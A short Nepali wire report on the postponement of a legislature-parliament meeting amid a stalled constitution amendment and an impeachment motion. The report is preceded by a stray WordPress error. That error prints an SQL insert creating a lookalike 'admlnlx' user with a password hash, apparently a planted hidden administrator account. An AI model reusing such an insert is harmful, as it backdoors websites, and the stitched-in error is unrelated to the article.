WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B9IAXspKSaJ6uI5i/JOYj5WG6Epv4Z/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-07 00:20:32', '', 'admlnlx', 'admlnlx')
काठमाडौँ, पुस ७-
व्यवस्थापिका–संसद्को आज १ः०० बजेका लागि तय गरिएको बैठक सूचना टाँस गरेर स्थगित भएको छ ।
संविधान संशोधन प्रस्ताव सदनमा दर्ता भएपछि लगातार अवरुद्ध हुँदै आएको बैठक यही पुस १० गते आइतबार दिनको १ः०० बजे बस्ने गरी तोकिएको सभामुख ओनसरी घर्तीका प्रेस सल्लाहकार बविन शर्माले जानकारी दिनुभयो ।
राजनीतिक सहमतिका लागि भन्दै बैठक स्थगित हुँदै जाँदा अख्तियार दुरुपयोग अनुसन्धान आयोगका निलम्बित प्रमुख आयुक्त लोकमानसिंह कार्कीमाथिको महाअभियोग प्रस्ताव, स्थानीय निकायको निर्वाचनसम्बन्धी विधेयक तथा संविधान संशोधनसम्बन्धी विधेयक समेत अगाडि बढ्न सकेको छैन । – रासस